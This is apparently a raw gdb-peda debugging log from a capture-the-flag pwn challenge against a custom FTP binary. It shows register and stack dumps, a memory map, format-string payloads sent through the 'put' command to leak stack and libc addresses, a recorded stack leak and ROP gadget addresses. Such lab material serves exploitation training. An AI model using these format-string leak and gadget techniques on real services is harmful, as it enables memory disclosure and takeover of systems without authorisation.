[----------------------------------registers-----------------------------------]
EAX: 0xffffcebc --> 0x7516c0c3 
EBX: 0x56558f64 --> 0x3e64 ('d>')
ECX: 0x0 
EDX: 0xffffcecc ("root\n\315\317\367\307\315\317\367\001")
ESI: 0xf7cfc000 --> 0x1d7d8c 
EDI: 0x0 
EBP: 0xffffcf38 --> 0xffffcf68 --> 0x0 
ESP: 0xffffce40 --> 0xffffcebc --> 0x7516c0c3 
EIP: 0x56556bc8 (<login+330>:	call   0x565563a0 <strncmp@plt>)
EFLAGS: 0x200292 (carry parity ADJUST zero SIGN trap INTERRUPT direction overflow)
[-------------------------------------code-------------------------------------]
   0x56556bc3 <login+325>:	push   eax
   0x56556bc4 <login+326>:	lea    eax,[ebp-0x7c]
   0x56556bc7 <login+329>:	push   eax
=> 0x56556bc8 <login+330>:	call   0x565563a0 <strncmp@plt>
   0x56556bcd <login+335>:	add    esp,0x10
   0x56556bd0 <login+338>:	test   eax,eax
   0x56556bd2 <login+340>:	jne    0x56556bf6 <login+376>
   0x56556bd4 <login+342>:	mov    ecx,DWORD PTR [ebx+0xa8]
Guessed arguments:
arg[0]: 0xffffcebc --> 0x7516c0c3 
arg[1]: 0x565571c7 --> 0xbb0d04ff 
arg[2]: 0x10 
[------------------------------------stack-------------------------------------]
0000| 0xffffce40 --> 0xffffcebc --> 0x7516c0c3 
0004| 0xffffce44 --> 0x565571c7 --> 0xbb0d04ff 
0008| 0xffffce48 --> 0x10 
0012| 0xffffce4c --> 0x56556a91 (<login+19>:	add    ebx,0x24d3)
0016| 0xffffce50 --> 0x1 
0020| 0xffffce54 --> 0xf7cfcdc7 --> 0xcfd8900a 
0024| 0xffffce58 --> 0x1 
0028| 0xffffce5c --> 0xf7afd6dc ("127.0.1.1")
[------------------------------------------------------------------------------]
Legend: code, data, rodata, value
0x56556bc8 in login ()
gdb-peda$ 

db-peda$ x/80wx 0x565571c7
0x565571c7:	0xbb0d04ff	0x1172ede4	0x2b696969	0xe33e3ee3

gdb-peda$ x/32c 0x565571c7
0x565571c7:	0xff	0x4	0xd	0xbb	0xe4	0xed	0x72	0x11
0x565571cf:	0x69	0x69	0x69	0x2b	0xe3	0x3e	0x3e	0xe3

ff040dbbe4ed72116969692be33e3ee3

gdb-peda$ vmmap
Start      End        Perm	Name
0x56555000 0x56556000 r--p	/home/mito/CTF/Securinets_CTF_Quals_2022/Pwn_FTP/ftp
0x56556000 0x56557000 r-xp	/home/mito/CTF/Securinets_CTF_Quals_2022/Pwn_FTP/ftp
0x56557000 0x56558000 r--p	/home/mito/CTF/Securinets_CTF_Quals_2022/Pwn_FTP/ftp
0x56558000 0x56559000 r--p	/home/mito/CTF/Securinets_CTF_Quals_2022/Pwn_FTP/ftp
0x56559000 0x5655a000 rw-p	/home/mito/CTF/Securinets_CTF_Quals_2022/Pwn_FTP/ftp
0x5655a000 0x5657b000 rw-p	[heap]
0xf7ae9000 0xf7af5000 r-xp	/lib/i386-linux-gnu/libnss_files-2.27.so
0xf7af5000 0xf7af6000 r--p	/lib/i386-linux-gnu/libnss_files-2.27.so
0xf7af6000 0xf7af7000 rw-p	/lib/i386-linux-gnu/libnss_files-2.27.so
0xf7af7000 0xf7aff000 rw-p	mapped
0xf7aff000 0xf7b1a000 r-xp	/lib/i386-linux-gnu/libpthread-2.27.so
0xf7b1a000 0xf7b1b000 ---p	/lib/i386-linux-gnu/libpthread-2.27.so
0xf7b1b000 0xf7b1c000 r--p	/lib/i386-linux-gnu/libpthread-2.27.so
0xf7b1c000 0xf7b1d000 rw-p	/lib/i386-linux-gnu/libpthread-2.27.so
0xf7b1d000 0xf7b1f000 rw-p	mapped
0xf7b1f000 0xf7b22000 r-xp	/lib/i386-linux-gnu/libdl-2.27.so
0xf7b22000 0xf7b23000 r--p	/lib/i386-linux-gnu/libdl-2.27.so
0xf7b23000 0xf7b24000 rw-p	/lib/i386-linux-gnu/libdl-2.27.so
0xf7b24000 0xf7cf9000 r-xp	/lib/i386-linux-gnu/libc-2.27.so
0xf7cf9000 0xf7cfa000 ---p	/lib/i386-linux-gnu/libc-2.27.so
0xf7cfa000 0xf7cfc000 r--p	/lib/i386-linux-gnu/libc-2.27.so
0xf7cfc000 0xf7cfd000 rw-p	/lib/i386-linux-gnu/libc-2.27.so
0xf7cfd000 0xf7d00000 rw-p	mapped
0xf7d00000 0xf7f90000 r-xp	/usr/lib/i386-linux-gnu/libcrypto.so.1.1
0xf7f90000 0xf7f91000 ---p	/usr/lib/i386-linux-gnu/libcrypto.so.1.1
0xf7f91000 0xf7faa000 r--p	/usr/lib/i386-linux-gnu/libcrypto.so.1.1
0xf7faa000 0xf7fab000 rw-p	/usr/lib/i386-linux-gnu/libcrypto.so.1.1
0xf7fab000 0xf7fae000 rw-p	mapped
0xf7fcf000 0xf7fd1000 rw-p	mapped
0xf7fd1000 0xf7fd4000 r--p	[vvar]
0xf7fd4000 0xf7fd6000 r-xp	[vdso]
0xf7fd6000 0xf7ffc000 r-xp	/lib/i386-linux-gnu/ld-2.27.so
0xf7ffc000 0xf7ffd000 r--p	/lib/i386-linux-gnu/ld-2.27.so
0xf7ffd000 0xf7ffe000 rw-p	/lib/i386-linux-gnu/ld-2.27.so
0xfffdd000 0xffffe000 rw-p	[stack]


gdb-peda$ run
Starting program: /home/mito/CTF/Securinets_CTF_Quals_2022/Pwn_FTP/ftp 
[Thread debugging using libthread_db enabled]
Using host libthread_db library "/lib/x86_64-linux-gnu/libthread_db.so.1".
Connected to 127.0.1.1
220 (xnFTPd v1.6.9)
Name (127.0.1.1): anonymous
331 Please specify the password.
Password: 
Remote system type is UNIX
Using binary mode to transfer files.
ftp> ?
Commands may be abbreviated.  Commands are:

		? : help
		dir : list files
		cat filename : cat file
		put text : create a new file and write text inside it
		uid : get uid
		su : change user

ftp> put aaaaaaaaaaaa
ftp> dir
Q.txt
flag.txt
solve.py
peda-session-ftp.txt
.gdb_history
.
..
note
ftp
ftp> cat note
aaaaaaaaaaaa
ftp> put AAAA,%p,%p,%p,%p,%p,%p,%p,%p,%p,%p,%p
ftp> cat note
AAAA,0x40,0x5655a1c0,0x5655a1c0,0x1,0xf7cfcdc7,0x1,0xf7afd6dc,0x1,0x5655718c,0x5655a1c0,0x5655a1c0
ftp> put AAAA,%p,%p,%p,%p,%p,%p,%p,%p,%p,%p,%p,%p,%p,%p,%p,%p,%p,%p,%p,%p,%p,%p
ftp> ftp> cat note
AAAA,0x40,0x5655a1c0,0x5655a1c0,0x1,0xf7cfcdc7,0x1,0xf7afd6dc,0x1,0x5655718c,0x5655a1c0,0x5655a1c0,0x65746f6e,0xf7cf0000,0xf7cfcdc7,0xf7b950f7,0xf7cfcd80,0xf7cfcdc7,0x1,ftp> 

[----------------------------------registers-----------------------------------]
EAX: 0xffffcdec ("AAAA,%p,%p,%p,%p,%p,%p,%p,%p,%p,%p,%p,%p,%p,%p,%p,%p,%p,%p,%")
EBX: 0x56558f64 --> 0x3e64 ('d>')
ECX: 0xffffcdec ("AAAA,%p,%p,%p,%p,%p,%p,%p,%p,%p,%p,%p,%p,%p,%p,%p,%p,%p,%p,%")
EDX: 0x5655a258 --> 0x0 
ESI: 0xf7cfc000 --> 0x1d7d8c 
EDI: 0x0 
EBP: 0xffffce38 (",%p,%p,%p,%p,%p,%p,%p,%p,%p,%p,%p,%p,%p,%p,%AAAA,%p,%p,%p,%p,%p,%p,%p,%p,%p,%p,%p,%p,%p,%p,%p,%p,%p,%p,%AAAA,%p,%p,%p,%p,%p,%p,%p,%p,%p,%p,%p,%p,%p,%p,%p,%p,%p,%p,%AAAA,%p,;\002s\302p,%p,%p,%p,%p,%p\336B\026\250%p,%"...)
ESP: 0xffffcd40 --> 0xffffcdec ("AAAA,%p,%p,%p,%p,%p,%p,%p,%p,%p,%p,%p,%p,%p,%p,%p,%p,%p,%p,%")
EIP: 0x56556991 (<process+564>:	call   0x56556310 <printf@plt>)
EFLAGS: 0x200296 (carry PARITY ADJUST zero SIGN trap INTERRUPT direction overflow)
[-------------------------------------code-------------------------------------]
   0x5655698a <process+557>:	sub    esp,0xc
   0x5655698d <process+560>:	lea    eax,[ebp-0x4c]
   0x56556990 <process+563>:	push   eax
=> 0x56556991 <process+564>:	call   0x56556310 <printf@plt>
   0x56556996 <process+569>:	add    esp,0x10
   0x56556999 <process+572>:	sub    esp,0xc
   0x5655699c <process+575>:	push   DWORD PTR [ebp-0xd0]
   0x565569a2 <process+581>:	call   0x565562c0 <fclose@plt>
Guessed arguments:
arg[0]: 0xffffcdec ("AAAA,%p,%p,%p,%p,%p,%p,%p,%p,%p,%p,%p,%p,%p,%p,%p,%p,%p,%p,%")
[------------------------------------stack-------------------------------------]
0000| 0xffffcd40 --> 0xffffcdec ("AAAA,%p,%p,%p,%p,%p,%p,%p,%p,%p,%p,%p,%p,%p,%p,%p,%p,%p,%p,%")
0004| 0xffffcd44 --> 0x40 ('@')
0008| 0xffffcd48 --> 0x5655a1c0 --> 0xfbad2490 
0012| 0xffffcd4c --> 0x5655a1c0 --> 0xfbad2490 
0016| 0xffffcd50 --> 0x1 
0020| 0xffffcd54 --> 0xf7cfcdc7 --> 0xcfd8900a 
0024| 0xffffcd58 --> 0x1 
0028| 0xffffcd5c --> 0xf7afd6dc ("127.0.1.1")
[------------------------------------------------------------------------------]
Legend: code, data, rodata, value
0x56556991 in process ()


gdb-peda$ x/100wx 0xffffcd00
0xffffcd00:	0x00000001	0xffffcd70	0x56557159	0x00000001
0xffffcd10:	0x56558f64	0xf7cfc000	0xf7afd700	0x00000000
0xffffcd20:	0xffffcd70	0x56557159	0xf7b8a20b	0x56558f64
0xffffcd30:	0xf7cfc000	0x00000000	0xffffce38	0x56556987
0xffffcd40:	0xffffcdec	0x00000040	0x5655a1c0	0x5655a1c0
0xffffcd50:	0x00000001	0xf7cfcdc7	0x00000001	0xf7afd6dc
0xffffcd60:	0x00000001	0x5655718c	0x5655a1c0	0x5655a1c0
0xffffcd70:	0x65746f6e	0xf7cf0000	0xf7cfcdc7	0xf7b950f7
0xffffcd80:	0xf7cfcd80	0xf7cfcdc7	0x00000001	0xf7b950f7
0xffffcd90:	0xf7cfcd80	0x000007d4	0x00000001	0x596b3a00
0xffffcda0:	0xffffce3c	0xf7b04b96	0xffffffff	0x20746163
0xffffcdb0:	0x65746f6e	0x0000000a	0x00000000	0x00000000
0xffffcdc0:	0x00000000	0x00000000	0x00000000	0x00000000
0xffffcdd0:	0x00000000	0x00000000	0x00000000	0x00000000
0xffffcde0:	0x00000000	0x00000000	0x70252c70	0x41414141
0xffffcdf0:	0x2c70252c	0x252c7025	0x70252c70	0x2c70252c
0xffffce00:	0x252c7025	0x70252c70	0x2c70252c	0x252c7025
0xffffce10:	0x70252c70	0x2c70252c	0x252c7025	0x70252c70
0xffffce20:	0x2c70252c	0x252c7025	0x41414100	0x2c70252c
0xffffce30:	0x252c7025	0x70252c70	0x2c70252c	0x252c7025
0xffffce40:	0x70252c70	0x2c70252c	0x252c7025	0x70252c70
0xffffce50:	0x2c70252c	0x252c7025	0x70252c70	0x2c70252c

ftp> put AAAA,%43$p
ftp> cat note
AAAA,0x41414141

gdb-peda$ x/80wx 0x56559000
0x56559000:	0x00000000	0x56559004	0x000003e8	0x00000000
0x56559010 <completed.7622>:	0x00000000	0x00000000	0x00000000	0x00000000
0x56559020:	0x00000000	0x00000000	0x00000000	0x00000000

[----------------------------------registers-----------------------------------]
EAX: 0xffffcdec ("aaaaaaaaaa\n")
EBX: 0x56558f64 --> 0x3e64 ('d>')
ECX: 0xffffcdec ("aaaaaaaaaa\n")
EDX: 0x5655a258 --> 0x0 
ESI: 0xf7cfc000 --> 0x1d7d8c 
EDI: 0x0 
EBP: 0xffffce38 --> 0xffffcf38 --> 0xffffcf68 --> 0x0 
ESP: 0xffffcd3c --> 0x56556996 (<process+569>:	add    esp,0x10)
EIP: 0xf7b75520 (<__printf>:	call   0xf7c5b409 <__x86.get_pc_thunk.ax>)
EFLAGS: 0x200296 (carry PARITY ADJUST zero SIGN trap INTERRUPT direction overflow)
[-------------------------------------code-------------------------------------]
   0xf7b7551b <__fprintf+27>:	ret    
   0xf7b7551c:	xchg   ax,ax
   0xf7b7551e:	xchg   ax,ax
=> 0xf7b75520 <__printf>:	call   0xf7c5b409 <__x86.get_pc_thunk.ax>
   0xf7b75525 <__printf+5>:	add    eax,0x186adb
   0xf7b7552a <__printf+10>:	sub    esp,0xc
   0xf7b7552d <__printf+13>:	mov    eax,DWORD PTR [eax-0x5c]
   0xf7b75533 <__printf+19>:	lea    edx,[esp+0x14]
No argument
[------------------------------------stack-------------------------------------]
0000| 0xffffcd3c --> 0x56556996 (<process+569>:	add    esp,0x10)
0004| 0xffffcd40 --> 0xffffcdec ("aaaaaaaaaa\n")
0008| 0xffffcd44 --> 0x40 ('@')
0012| 0xffffcd48 --> 0x5655a1c0 --> 0xfbad2480 
0016| 0xffffcd4c --> 0x5655a1c0 --> 0xfbad2480 
0020| 0xffffcd50 --> 0x1 
0024| 0xffffcd54 --> 0xf7cfcdc7 --> 0xcfd8900a 
0028| 0xffffcd58 --> 0x1 
[------------------------------------------------------------------------------]
Legend: code, data, rodata, value
__printf (format=0xffffcdec "aaaaaaaaaa\n") at printf.c:28
28	printf.c: No such file or directory.
gdb-peda$ x/100wx 0xffffcd00
0xffffcd00:	0x00000001	0xffffcd70	0x56557159	0x00000001
0xffffcd10:	0x56558f64	0xf7cfc000	0xf7afd700	0x00000000
0xffffcd20:	0xffffcd70	0x56557159	0xf7b8a20b	0x56558f64
0xffffcd30:	0xf7cfc000	0x00000000	0xffffce38	0x56556996
0xffffcd40:	0xffffcdec	0x00000040	0x5655a1c0	0x5655a1c0
0xffffcd50:	0x00000001	0xf7cfcdc7	0x00000001	0xf7afd6dc
0xffffcd60:	0x00000001	0x5655718c	0x5655a1c0	0x5655a1c0
0xffffcd70:	0x65746f6e	0xf7cf0000	0xf7cfcdc7	0xf7b950f7
0xffffcd80:	0xf7cfcd80	0xf7cfcdc7	0x00000001	0xf7b950f7
0xffffcd90:	0xf7cfcd80	0x000007d4	0x00000001	0xd0464d00

stack_leak = 0xffffceac


0xffffcd70:	0x00000001	0xffffcde0	0x56557159	0x00000001
0xffffcd80:	0x56558f64	0xf7cfc000	0xf7afd700	0x00000000
0xffffcd90:	0xffffcde0	0x56557159	0xf7b8a20b	0x56558f64
0xffffcda0:	0xf7cfc000	0x00000000	0xffffcea8	0x56556996
0xffffcdb0:	0xffffce5c	0x00000040	0x5655a1c0	0x5655a1c0
0xffffcdc0:	0x00000001	0xf7cfcdc7	0x00000001	0xf7afd6dc
0xffffcdd0:	0x00000001	0x5655718c	0x5655a1c0	0x5655a1c0
0xffffcde0:	0x65746f6e	0xf7cf0000	0xf7cfcdc7	0xf7b950f7
0xffffcdf0:	0xf7cfcd80	0xf7cfcdc7	0x00000001	0xf7b950f7
0xffffce00:	0xf7cfcd80	0x000007d4	0x00000001	0x71fb4900
0xffffce10:	0xffffceac	0xf7b04b96	0xffffffff	0x20746163
0xffffce20:	0x65746f6e	0x0000000a	0x00000000	0x00000000
0xffffce30:	0x00000000	0x00000000	0x00000000	0x00000000
0xffffce40:	0x00000000	0x00000000	0x00000000	0x00000000
0xffffce50:	0x00000000	0x00000000	0xf7b04bde	0x24343225
0xffffce60:	0x24000a70	0x00000a73	0xffffcfa8	0xf7be4352
0xffffce70:	0xffffce84	0xffffcf2c	0xffffced0	0xf7e345d8
0xffffce80:	0xffffcee8	0x000000d0	0x000003e8	0x000003e8
0xffffce90:	0x00000000	0x00000000	0x00000001	0x71fb4900
0xffffcea0:	0xf7cfc000	0x56558f64	0xffffcfa8	0x56556c20
0xffffceb0:	0xf7afd6dc	0x000003e8	0x00000000	0x56556a91
0xffffcec0:	0x00000001	0xf7cfcdc7	0x00000001	0xf7afd6dc
0xffffced0:	0xa81642de	0x8ce26bdf	0x4ede1c18	0xc273023b
0xffffcee0:	0x00000020	0x00000000	0x00000000	0x00000000


0xffffcd60:	0x5655a1c0	0xffffce5c	0x0000003f	0x0000000a
0xffffcd70:	0x00000001	0xffffcde0	0x56557159	0x00000001
0xffffcd80:	0x56558f64	0xf7cfc000	0xf7afd700	0x00000000
0xffffcd90:	0xffffcde0	0x56557159	0xf7b8a20b	0x56558f64
0xffffcda0:	0xf7cfc000	0x00000000	0xffffcea8	0x56556996
0xffffcdb0:	0xffffce5c	0x00000040	0x5655a1c0	0x5655a1c0
0xffffcdc0:	0x00000001	0xf7cfcdc7	0x00000001	0xf7afd6dc
0xffffcdd0:	0x00000001	0x5655718c	0x5655a1c0	0x5655a1c0
0xffffcde0:	0x65746f6e	0xf7cf0000	0xf7cfcdc7	0xf7b950f7
0xffffcdf0:	0xf7cfcd80	0xf7cfcdc7	0x00000001	0xf7b950f7
0xffffce00:	0xf7cfcd80	0x000007d4	0x00000001	0x9ece2900
0xffffce10:	0xffffceac	0xf7b04b96	0xffffffff	0x20746163
0xffffce20:	0x65746f6e	0x0000000a	0x00000000	0x00000000
0xffffce30:	0x00000000	0x00000000	0x00000000	0x00000000
0xffffce40:	0x00000000	0x00000000	0x00000000	0x00000000
0xffffce50:	0x00000000	0x00000000	0xf7b04bde	0xffffcdb4
0xffffce60:	0xffffcdb6	0x35363825	0x34256339	0x6e682433
0xffffce70:	0x37343525	0x25633736	0x68243434	0xf7000a6e
0xffffce80:	0xffffcee8	0x000000d0	0x000003e8	0x000003e8
0xffffce90:	0x00000000	0x00000000	0x00000001	0x9ece2900
0xffffcea0:	0xf7cfc000	0x56558f64	0xffffcfa8	0x56556c20
0xffffceb0:	0xf7afd6dc	0x000003e8	0x00000000	0x56556a91

0x000f3357: add esp, 0xd4; pop ebx; pop esi; ret; 
0x000e8463: add esp, 0xd4; pop ebx; pop esi; ret;


